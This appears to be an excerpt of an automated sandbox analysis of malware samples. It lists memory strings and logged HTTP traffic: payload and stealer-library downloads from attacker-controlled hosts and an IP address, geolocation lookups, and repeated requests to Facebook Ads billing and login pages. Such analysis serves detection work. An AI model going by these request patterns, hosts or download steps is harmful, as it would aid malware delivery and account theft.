          Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: 98D7.exe, 00000010.00000003.474645572.0000000002892000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messenger.com/
          Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/qu9vi-bmWl3.js?_nc_x=Ij3Wp8lg5Kz
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0
          Source: llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0
          Source: 98D7.exe, 00000010.00000003.476889083.000000000288E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/4x04rJtLVMo.js?_nc_x=Ij3Wp8lg5Kz
          Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yR/r/n9ktzHPknGx.js?_nc_x=Ij3Wp8lg5Kz
          Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0
          Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/ue_OWlkLDZP.js?_nc_x=Ij3Wp8lg5Kz
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/0
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/mkZZ0EnRB0x.js?_nc_x=Ij3Wp8lg5Kz
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/0
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ym/r/2Z9gzYPL3TW.js?_nc_x=Ij3Wp8lg5Kz
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yX/l/en_US/WYC6LbamQUd.js?_nc_x=Ij3Wp8lg5Kz
          Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownDNS traffic detected: queries for: potunulit.org
          Source: global trafficHTTP traffic detected: GET /systems/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: flytourchip.com.br
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /2701.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
          Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
          Source: global trafficHTTP traffic detected: GET /llpb1133.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.73.134.27
          Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70Host: iueg.aappatey.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gnse3G6QHxmrV1%2FSGGhyhlKBQirQCs8SBnoP8Hqt97J01hgXqEr%2FqdRRF7r15GGDPwnzz4pR73p5RnDH84zEShW5P5OuBq%2F2jo2VmbW1%2FMakUdtmpss7tZgcXl7azYew"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e475f6a0435fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 0d 0a 03 00 00 00 1f 3d 52 0d 0a Data Ascii: 7=R
